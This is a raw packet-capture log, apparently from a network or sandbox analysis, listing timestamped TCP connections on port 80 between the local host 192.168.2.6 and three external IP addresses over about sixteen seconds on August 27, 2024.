Aug 27, 2024 14:21:29.612068892 CEST	80	52483	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:29.658366919 CEST	80	52480	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:29.659603119 CEST	52480	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:29.659603119 CEST	52480	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:29.663634062 CEST	52484	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:29.664446115 CEST	80	52480	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:29.668517113 CEST	80	52484	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:29.671889067 CEST	52484	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:29.671889067 CEST	52484	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:29.676704884 CEST	80	52484	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:30.300637007 CEST	80	52483	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:30.303702116 CEST	52483	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:30.306041002 CEST	52485	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:30.306041002 CEST	52483	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:30.310852051 CEST	80	52485	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:30.311273098 CEST	80	52483	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:30.311373949 CEST	52485	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:30.311373949 CEST	52483	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:30.311748981 CEST	52485	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:30.316493034 CEST	80	52485	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.002804041 CEST	80	52485	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.002861023 CEST	52485	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.110940933 CEST	52485	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.111421108 CEST	52486	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.116096973 CEST	80	52485	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.116134882 CEST	52485	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.116292953 CEST	80	52486	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.116338015 CEST	52486	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.116467953 CEST	52486	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.121303082 CEST	80	52486	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.310869932 CEST	80	52484	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:31.311115980 CEST	52484	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.311173916 CEST	52484	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.316144943 CEST	80	52484	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:31.422322035 CEST	52487	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.427232027 CEST	80	52487	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:31.427423954 CEST	52487	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.427551985 CEST	52487	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.432336092 CEST	80	52487	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:31.827919960 CEST	80	52486	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.827999115 CEST	52486	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.830701113 CEST	52488	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.830735922 CEST	52486	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.837002993 CEST	80	52488	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.837120056 CEST	52488	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.837229013 CEST	52488	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.837347984 CEST	80	52486	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.839572906 CEST	52486	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.841944933 CEST	80	52488	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:31.951468945 CEST	52488	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:31.951527119 CEST	52479	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:31.951610088 CEST	52487	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.955586910 CEST	52489	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.960429907 CEST	80	52489	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:31.960607052 CEST	52489	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.960798979 CEST	52489	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:31.965518951 CEST	80	52489	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:32.062706947 CEST	52490	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.062707901 CEST	52491	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:32.067641973 CEST	80	52490	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:32.067653894 CEST	80	52491	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:32.067728996 CEST	52491	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:32.067733049 CEST	52490	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.067841053 CEST	52490	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.067884922 CEST	52491	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:32.072788000 CEST	80	52490	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:32.072860956 CEST	80	52491	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:32.745630980 CEST	80	52490	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:32.745690107 CEST	52490	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.750257969 CEST	52490	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.750698090 CEST	52492	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.755464077 CEST	80	52492	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:32.755518913 CEST	80	52490	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:32.755523920 CEST	52492	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.755565882 CEST	52490	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.755676031 CEST	52492	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:32.760430098 CEST	80	52492	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:33.473093033 CEST	80	52492	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:33.473148108 CEST	52492	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:33.545860052 CEST	80	52489	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:33.548254013 CEST	52489	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:33.548312902 CEST	52489	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:33.553117990 CEST	80	52489	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:33.578635931 CEST	52492	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:33.579482079 CEST	52493	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:33.584369898 CEST	80	52493	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:33.584456921 CEST	80	52492	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:33.584563017 CEST	52493	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:33.584564924 CEST	52492	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:33.584693909 CEST	52493	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:33.589442968 CEST	80	52493	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:33.659486055 CEST	52494	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:33.664349079 CEST	80	52494	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:33.664433002 CEST	52494	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:33.664618015 CEST	52494	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:33.669411898 CEST	80	52494	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:34.287911892 CEST	80	52493	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:34.289551973 CEST	52493	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:34.292167902 CEST	52493	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:34.292198896 CEST	52495	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:34.296998978 CEST	80	52495	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:34.297218084 CEST	52495	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:34.297224045 CEST	80	52493	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:34.297487020 CEST	52495	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:34.297590017 CEST	52493	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:34.302254915 CEST	80	52495	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:34.988595963 CEST	80	52495	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:34.988645077 CEST	52495	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.095527887 CEST	52495	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.095873117 CEST	52496	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.100970030 CEST	80	52496	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.101030111 CEST	52496	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.101155043 CEST	52496	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.105891943 CEST	80	52496	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.106707096 CEST	80	52495	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.106743097 CEST	52495	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.264311075 CEST	80	52494	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:35.264365911 CEST	52494	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:35.286329985 CEST	52494	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:35.288738012 CEST	52497	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:35.291212082 CEST	80	52494	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:35.293694019 CEST	80	52497	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:35.293752909 CEST	52497	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:35.293852091 CEST	52497	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:35.298620939 CEST	80	52497	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:35.826446056 CEST	80	52496	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.826595068 CEST	52496	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.829016924 CEST	52496	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.829018116 CEST	52498	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.834652901 CEST	80	52498	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.835531950 CEST	52498	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.835642099 CEST	52498	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.836734056 CEST	80	52496	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.840472937 CEST	80	52498	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:35.840543032 CEST	52496	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.967761040 CEST	52498	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:35.967776060 CEST	52497	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:35.968154907 CEST	52491	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:35.977382898 CEST	52499	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:35.982213020 CEST	80	52499	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:35.982315063 CEST	52499	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:35.982516050 CEST	52499	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:35.987307072 CEST	80	52499	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:36.079598904 CEST	52500	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.079602957 CEST	52501	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:36.084448099 CEST	80	52500	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:36.084462881 CEST	80	52501	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:36.084537029 CEST	52500	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.084610939 CEST	52501	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:36.084707975 CEST	52501	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:36.087498903 CEST	52500	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.089468002 CEST	80	52501	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:36.092394114 CEST	80	52500	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:36.787321091 CEST	80	52500	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:36.787401915 CEST	52500	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.789604902 CEST	52500	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.790054083 CEST	52502	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.796531916 CEST	80	52502	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:36.796610117 CEST	52502	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.796931982 CEST	52502	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.796938896 CEST	80	52500	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:36.796999931 CEST	52500	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:36.802833080 CEST	80	52502	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:37.548278093 CEST	80	52502	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:37.549586058 CEST	52502	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:37.657397032 CEST	52503	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:37.657397985 CEST	52502	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:37.663166046 CEST	80	52503	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:37.663250923 CEST	52503	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:37.663379908 CEST	52503	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:37.663562059 CEST	80	52502	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:37.663697958 CEST	52502	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:37.669090033 CEST	80	52503	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:37.707176924 CEST	80	52501	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:37.708538055 CEST	52501	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:37.708674908 CEST	52501	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:37.711505890 CEST	52504	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:37.713377953 CEST	80	52501	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:37.716305971 CEST	80	52504	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:37.717581987 CEST	52504	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:37.718144894 CEST	52504	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:37.722923040 CEST	80	52504	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:38.408217907 CEST	80	52503	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:38.408291101 CEST	52503	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:38.410808086 CEST	52503	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:38.410810947 CEST	52505	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:38.415643930 CEST	80	52505	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:38.415918112 CEST	52505	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:38.416042089 CEST	52505	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:38.416059971 CEST	80	52503	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:38.419627905 CEST	52503	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:38.420789003 CEST	80	52505	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:39.141241074 CEST	80	52505	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:39.141294956 CEST	52505	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.250585079 CEST	52505	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.250871897 CEST	52506	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.255707026 CEST	80	52506	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:39.255772114 CEST	52506	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.255882025 CEST	52506	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.256145000 CEST	80	52505	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:39.256190062 CEST	52505	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.260890007 CEST	80	52506	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:39.314518929 CEST	80	52504	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:39.314619064 CEST	52504	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:39.314661980 CEST	52504	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:39.319802999 CEST	80	52504	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:39.428159952 CEST	52507	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:39.433054924 CEST	80	52507	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:39.433125973 CEST	52507	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:39.433233023 CEST	52507	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:39.438527107 CEST	80	52507	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:39.998342991 CEST	52506	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:39.998347998 CEST	52499	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:39.998414993 CEST	52507	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:40.001127005 CEST	52509	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:40.001220942 CEST	52508	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.006141901 CEST	80	52509	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:40.006160021 CEST	80	52508	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:40.006249905 CEST	52509	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:40.006251097 CEST	52508	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.006412029 CEST	52509	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:40.006503105 CEST	52508	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.011209011 CEST	80	52509	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:40.011599064 CEST	80	52508	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:40.111706018 CEST	52510	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:40.119941950 CEST	80	52510	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:40.123617887 CEST	52510	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:40.127604008 CEST	52510	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:40.132431984 CEST	80	52510	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:40.708278894 CEST	80	52508	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:40.708331108 CEST	52508	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.834780931 CEST	52508	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.835305929 CEST	52511	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.842679024 CEST	80	52511	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:40.842729092 CEST	80	52508	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:40.842751980 CEST	52511	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.842792988 CEST	52508	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.846854925 CEST	52511	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:40.851739883 CEST	80	52511	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:41.527040958 CEST	80	52511	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:41.527666092 CEST	52511	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:41.529957056 CEST	52511	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:41.530316114 CEST	52512	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:41.535156012 CEST	80	52512	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:41.535213947 CEST	80	52511	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:41.535244942 CEST	52512	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:41.535355091 CEST	52512	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:41.535422087 CEST	52511	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:41.540196896 CEST	80	52512	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:41.797322989 CEST	80	52509	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:41.799671888 CEST	52509	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:41.799762011 CEST	52509	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:41.804564953 CEST	80	52509	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:41.907596111 CEST	52513	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:41.912672997 CEST	80	52513	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:41.912795067 CEST	52513	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:41.912908077 CEST	52513	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:41.917821884 CEST	80	52513	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:42.300256014 CEST	80	52512	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:42.300415993 CEST	52512	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:42.407058001 CEST	52512	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:42.407067060 CEST	52514	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:42.573143959 CEST	80	52514	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:42.573224068 CEST	52514	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:42.573390007 CEST	80	52512	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:42.573410034 CEST	52514	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:42.573437929 CEST	52512	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:42.579915047 CEST	80	52514	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:43.314912081 CEST	80	52514	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:43.314968109 CEST	52514	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:43.317447901 CEST	52514	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:43.317743063 CEST	52515	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:43.322518110 CEST	80	52515	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:43.322577953 CEST	52515	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:43.322693110 CEST	52515	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:43.322787046 CEST	80	52514	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:43.322824001 CEST	52514	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:43.327409029 CEST	80	52515	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:43.595235109 CEST	80	52513	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:43.596580029 CEST	52513	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:43.596580029 CEST	52513	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:43.603146076 CEST	80	52513	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:43.656100035 CEST	52516	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:43.661135912 CEST	80	52516	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:43.663785934 CEST	52516	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:43.663785934 CEST	52516	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:43.668745041 CEST	80	52516	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:44.014758110 CEST	52516	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:44.014846087 CEST	52515	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.014847994 CEST	52510	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:44.021104097 CEST	52517	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:44.026000023 CEST	80	52517	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:44.027836084 CEST	52517	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:44.031732082 CEST	52517	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:21:44.037770033 CEST	80	52517	89.23.103.42	192.168.2.6
Aug 27, 2024 14:21:44.126058102 CEST	52518	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.126060009 CEST	52519	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:44.131144047 CEST	80	52518	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:44.131159067 CEST	80	52519	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:44.131246090 CEST	52518	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.131247997 CEST	52519	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:44.131405115 CEST	52518	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.131747007 CEST	52519	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:44.136171103 CEST	80	52518	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:44.136523008 CEST	80	52519	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:44.835163116 CEST	80	52518	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:44.835216999 CEST	52518	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.838427067 CEST	52518	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.838690996 CEST	52520	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.843630075 CEST	80	52518	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:44.843682051 CEST	52518	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.843693972 CEST	80	52520	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:44.843744993 CEST	52520	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.843936920 CEST	52520	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:44.848706961 CEST	80	52520	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:45.538913965 CEST	80	52520	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:45.541382074 CEST	52520	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:45.656779051 CEST	52521	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:45.656780005 CEST	52520	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:45.661700010 CEST	80	52521	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:45.661902905 CEST	80	52520	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:45.663590908 CEST	52520	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:45.663593054 CEST	52521	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:45.663741112 CEST	52521	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:21:45.672559977 CEST	80	52521	185.208.158.116	192.168.2.6
Aug 27, 2024 14:21:45.814213037 CEST	80	52519	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:45.815850973 CEST	52519	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:45.815926075 CEST	52519	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:45.821510077 CEST	52522	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:45.822120905 CEST	80	52519	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:45.828752041 CEST	80	52522	185.209.162.226	192.168.2.6
Aug 27, 2024 14:21:45.829617977 CEST	52522	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:21:45.832520962 CEST	52522	80	192.168.2.6	185.209.162.226
